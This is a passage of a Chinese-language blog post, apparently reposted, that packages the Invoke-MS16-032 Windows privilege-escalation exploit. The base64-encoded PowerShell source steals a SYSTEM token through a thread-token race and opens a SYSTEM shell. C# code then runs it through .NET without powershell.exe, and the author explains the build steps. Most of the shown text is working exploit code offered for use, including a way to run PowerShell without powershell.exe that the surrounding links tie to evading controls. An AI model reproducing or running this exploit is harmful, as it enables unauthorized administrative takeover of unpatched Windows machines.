hyZWFkIGluICRUaHJlYWRBcnJheSl7CiAgICAKICAgICAgICAjIEdldCBoYW5kbGUgdG8gU1lTVEVNIGFjY2VzcyB0b2tlbgogICAgICAgIEdldC1TeXN0ZW1Ub2tlbgogICAgICAgIAogICAgICAgIGVjaG8gImBuWypdIFNuaWZmaW5nIG91dCBTWVNURU0gc2hlbGwuLiIKICAgICAgICBlY2hvICJgbls+XSBEdXBsaWNhdGluZyBTWVNURU0gdG9rZW4iCiAgICAgICAgJGhEdXBsaWNhdGVUb2tlbkhhbmRsZSA9IFtJbnRQdHJdOjpaZXJvCiAgICAgICAgJENhbGxSZXN1bHQgPSBbQWR2YXBpMzJdOjpEdXBsaWNhdGVUb2tlbigkU3lzVG9rZW5IYW5kbGUsIDIsIFtyZWZdJGhEdXBsaWNhdGVUb2tlbkhhbmRsZSkKICAgICAgICAKICAgICAgICAjIFNpbXBsZSBQUy
BydW5zcGFjZSBkZWZpbml0aW9uCiAgICAgICAgZWNobyAiWz5dIFN0YXJ0aW5nIHRva2VuIHJhY2UiCiAgICAgICAgJFJ1bnNwYWNlID0gW3J1bnNwYWNlZmFjdG9yeV06OkNyZWF0ZVJ1bnNwYWNlKCkKICAgICAgICAkU3RhcnRUb2tlblJhY2UgPSBbcG93ZXJzaGVsbF06OkNyZWF0ZSgpCiAgICAgICAgJFN0YXJ0VG9rZW5SYWNlLnJ1bnNwYWNlID0gJFJ1bnNwYWNlCiAgICAgICAgJFJ1bnNwYWNlLk9wZW4oKQogICAgICAgIFt2b2lkXSRTdGFydFRva2VuUmFjZS5BZGRTY3JpcHQoewogICAgICAgICAgICBQYXJhbSAoJFRocmVhZCwgJGhEdXBsaWNhdGVUb2tlbkhhbmRsZSkKICAgICAgICAgICAgd2hpbGUgKCR0cnVlKSB7CiAgICAgICAgICAgICAgICAkQ2FsbFJlc3VsdCA9IFtBZHZhcGkzMl06OlNldFRocmVhZFRva2VuKFtyZWZdJFRocmVhZCwgJGhEdXBsaWNhdGVUb2tlbkhhbmRsZSkKICAgICAgICAgICAgfQogICAgICAgIH0pLkFkZEFyZ3VtZW50KCRUaHJlYWQpLkFkZEFyZ3VtZW50KCRoRHVwbGljYXRlVG9rZW5IYW5kbGUpCiAgICAgICAgJEFzY09iaiA9ICRTdGFydFRva2VuUmFjZS5CZWdpbkludm9rZSgpCiAgICAgICAgCiAgICAgICAgZWNobyAiWz5dIFN0YXJ0aW5nIHByb2Nlc3MgcmFjZSIKICAgICAgICAjIEFkZGluZyBhIHRpbWVvdXQgKDEwIHNlY29uZHMpIGhlcmUgdG8gc2FmZWd1YXJkIGZyb20gZWRnZS1jYXNlcwogICAgICAgICRTYWZlR3VhcmQgPSBbZGlhZ25vc3RpY3Muc3RvcHdhdGNoXTo6U3RhcnROZXcoKQogICAgICAgIHdoaWxlICgkU2FmZUd1YXJkLkVsYXBzZWRNaWxsaXNlY29uZHMgLWx0IDEwMDAwKSB7CiAgICAgICAgIyBTdGFydHVwSW5mbyBTdHJ1Y3QKICAgICAgICAkU3RhcnR1cEluZm8gPSBOZXctT2JqZWN0IFNUQVJUVVBJTkZPCiAgICAgICAgJFN0YXJ0dXBJbmZvLmNiID0gW1N5c3RlbS5SdW50aW1lLkludGVyb3BTZXJ2aWNlcy5NYXJzaGFsXTo6U2l6ZU9mKCRTdGFydHVwSW5mbykgIyBTdHJ1Y3QgU2l6ZQogICAgICAgICRTdGFydHVwSW5mby5kd0ZsYWdzID0gMHgwMDAwMDEwMSAjIFNUQVJURl9VU0VTVERIQU5ETEVTCiAgICAgICAgICAgICRTdGFydHVwSW5mby53U2hvd1dpbmRvdyA9IDA7CiAgICAgICAgIyBQcm9jZXNzSW5mbyBTdHJ1Y3QKICAgICAgICAkUHJvY2Vzc0luZm8gPSBOZXctT2JqZWN0IFBST0NFU1NfSU5GT1JNQVRJT04KICAgICAgICAKICAgICAgICAjIENyZWF0ZVByb2Nlc3NXaXRoTG9nb25XIC0tPiBscEN1cnJlbnREaXJlY3RvcnkKICAgICAgICAkR2V0Q3VycmVudFBhdGggPSAoR2V0LUl0ZW0gLVBhdGggIi5cIiAtVmVyYm9zZSkuRnVsbE5hbWUKICAgICAgICAKICAgICAgICAjIExPR09OX05FVENSRURFTlRJQUxTX09OTFkgLyBDUkVBVEVfU1VTUEVOREVECiAgICAgICAgJENhbGxSZXN1bHQgPSBbQWR2YXBpMzJdOjpDcmVhdGVQcm9jZXNzV2l0aExvZ29uVygKICAgICAgICAgICAgInVzZXIiLCAiZG9tYWluIiwgInBhc3MiLAogICAgICAgICAgICAweDAwMD
AwMDAyLCAkQXBwbGljYXRpb24sJENvbW1hbmRsaW5lLAogICAgICAgICAgICAweDAwMDAwMDA0LCAkbnVsbCwgJEdldEN1cnJlbnRQYXRoLAogICAgICAgICAgICBbcmVmXSRTdGFydHVwSW5mbywgW3JlZl0kUHJvY2Vzc0luZm8pCiAgICAgICAgICAgIAogICAgICAgICRoVG9rZW5IYW5kbGUgPSBbSW50UHRyXTo6WmVybwogICAgICAgICRDYWxsUmVzdWx0ID0gW0FkdmFwaTMyXTo6T3BlblByb2Nlc3NUb2tlbigkUHJvY2Vzc0luZm8uaFByb2Nlc3MsIDB4MjgsIFtyZWZdJGhUb2tlbkhhbmRsZSkKICAgICAgICAjIElmIHdlIGNhbid0IG9wZW4gdGhlIHByb2Nlc3MgdG9rZW4gaXQncyBhIFNZU1RFTSBzaGVsbCEKICAgICAgICBpZiAoISRDYWxsUmVzdWx0KSB7CiAgICAgICAgICAgIGVjaG8gIlshXSBIb2x5IGhhbmRsZSBsZWFrIEJhdG1hbiwgd2UgaGF2ZSBhIFNZU1RFTSBzaGVsbCEhYG4iCiAgICAgICAgICAgICRDYWxsUmVzdWx0ID0gW0tlcm5lbDMyXTo6UmVzdW1lVGhyZWFkKCRQcm9jZXNzSW5mby5oVGhyZWFkKQogICAgICAgICAgICAkU3RhcnRUb2tlblJhY2UuU3RvcCgpCiAgICAgICAgICAgICRTYWZlR3VhcmQuU3RvcCgpCiAgICAgICAgICAgIFJldHVybgogICAgICAgIH0KICAgICAgICAgICAgCiAgICAgICAgIyBDbGVhbiB1cCBzdXNwZW5kZWQgcHJvY2VzcwogICAgICAgICRDYWxsUmVzdWx0ID0gW0tlcm5lbDMyXTo6VGVybWluYXRlUHJvY2VzcygkUHJvY2Vzc0luZm8uaFByb2Nlc3MsIDEpCiAgICAgICAgJENhbGxSZXN1bHQgPSBbS2VybmVsMzJdOjpDbG9zZUhhbmRsZSgkUHJvY2Vzc0luZm8uaFByb2Nlc3MpCiAgICAgICAgJENhbGxSZXN1bHQgPSBbS2VybmVsMzJdOjpDbG9zZUhhbmRsZSgkUHJvY2Vzc0luZm8uaFRocmVhZCkKICAgICAgICB9CiAgICAgICAgCiAgICAgICAgIyBLaWxsIHJ1bnNwYWNlICYgc3RvcHdhdGNoIGlmIGVkZ2UtY2FzZQogICAgICAgICRTdGFydFRva2VuUmFjZS5TdG9wKCkKICAgICAgICAkU2FmZUd1YXJkLlN0b3AoKQogICAgfQp9"));         public void ExecuteSynchronously(string aplication,string commandline)         {             string Commandout;             InitialSessionState iss = InitialSessionState.CreateDefault();             Runspace rs = RunspaceFactory.CreateRunspace(iss);             rs.Open();             PowerShell ps = PowerShell.Create();             ps.Runspace = rs;             ps.AddScript(PSInvoke_MS16_032);             if (commandline != "")             {                  Commandout = "Invoke-MS16-032 -Application /"" + aplication + "/" -Commandline " + "/""+commandline+"/"";             }             else{                  Commandout = 
"Invoke-MS16-032 -Application " + aplication;             }             Console.WriteLine(Commandout);             ps.AddScript(Commandout);             ps.AddCommand("Out-Default");             ps.Invoke();             rs.Close();         }     } } 

base64 的内容是 https://raw.githubusercontent.com/Ridter/Pentest/master/powershell/MyShell/Invoke-MS16-032.ps1 这个脚本全部内容的 base64 编码（你也可以使用自己的 PowerShell 脚本）。由于我修改的这个版本带有参数，所以简单地写了上面的 C# 代码，通过 .NET 来执行 PowerShell。

编译需要 System.Management.Automation.dll，具体步骤已写在 cs 文件开头的注释里，请自行编译。只在本机做了测试，没有测试其他环境，测试 Demo 如下：

http://static.wooyun.org/upload/image/201606/2016063013052815262.gif

通过 .NET 来执行 PowerShell，并不需要 powershell.exe。详情可以看一下 [p0wnedShell](https://github.com/Cn33liz/p0wnedShell) 或者 http://zone.wooyun.org/content/26831

原文  http://evi1cg.me/archives/Compile_Your_Powreshell_Script.html